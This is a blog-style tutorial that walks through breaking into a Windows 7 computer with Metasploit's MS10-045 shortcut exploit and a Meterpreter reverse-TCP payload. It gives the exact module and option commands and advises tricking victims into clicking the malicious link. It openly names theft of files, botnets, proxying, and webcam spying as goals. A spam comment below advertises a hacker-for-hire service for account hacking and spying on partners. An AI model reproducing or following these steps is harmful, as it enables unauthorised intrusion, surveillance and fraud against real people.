Crack Windows 7 Computer In Kali Linux/ Backtrack

:: CRACK WINDOWS 7 COMPUTER IN KALI LINUX ::


In this tutorial, I will show you how to use a simple shortcut file to crack a windows 7 computer.

:: Intro ::

:Windows 7 is now the most popular OS for desktop and laptop computers, especially now that XP is no longer going to be supported by Microsoft. 

:Cracking into a computer can be useful for a number of reasons: it can give you access to the rest of the network, you can use it as a proxy to hide your IP, you can steal valuable files/details, you can use it as part of a botnet to DOS, etc, and more.


:The operating system itself has become quite secure, but numerous vulnerabilities can still be found in other programs installed like the browser, adobe reader, and office. The vulnerability we will exploit is one found in the way windows 7 handles shortcut files.

:Lets begin...!



1 :: Open Metasploit
You should be able to do this by yourself by now.

2 :: Select the Exploit
Microsoft has identified this vulnerability as MS10-045, it takes advantage of a buffer overflow in the shortcut dll. Use this command in Metasploit to load the exploit:

msf > use windows/ms10_045_shortcut_icon_dllloader
3 :: Configure the Exploit OptionsThe first option to set is the payload, and as before, we will use the meterpreter. this is an amazingly powerful payload which we can use to completely own their box.
:Code:set PAYLOAD windows/meterpreter/reverse_tcp
Then we need to set the LHOST, which is the IP of our (the attackers) computer:

:Code:set LHOST 192.168.1.111
4 :: Run The ExploitAs usual, just use the command:
Code:exploit
And this will generate a link and a server to host that link.
Now we need the victim to click the malicious link!!


5 :: Send The Link To The VictimThis will require a bit of social engineering to convince the user to click the link. Be creative, tell them it is the latest movie download site or the password to a locked RAR file. When the victim clicks the link, their security settings will probably prompt them to allow or deny the webpage access to windows explorer, and they must click allow.
When the victim clicks on the "Allow" prompt, Metasploit begins the process of establishing a client/server connection between you and the victim. This process is fairly slow, so be patient. It may not even work, but be patient and hope it does :)

We will now have control of their computer through the meterpreter installed on their machine. Now you can go ahead and do almost anything you like! In previous tutorials i covered how to download files and view the webcam/microphone, but the fun doesn't have to stop there!
Download Backtrack 5R3 32 BitDownload Backtrack 5R3 64 Bit
Click to Like Our Facebook Page


1 comment :

  1. You can reach out for some hacking assistance from this software genius hacker at Tomcyberghost@gmail.com if you're having infidelity issues in your relationship and wish to expose your cheating partner, if your funds are hanging in online trading platforms like expert-option, cal financial, Analyst, coin spot, Ctx Prime and many more, he fixes and improve credit score, hack on at the base server, hacks all social media accounts as well, his services are legit and affordable, you can also reach him through email and also on Text/WhatsApp +1 (404) 941-6785, he's a legit and reliable hacker, his customer service and efficiency is top notch.

    ReplyDelete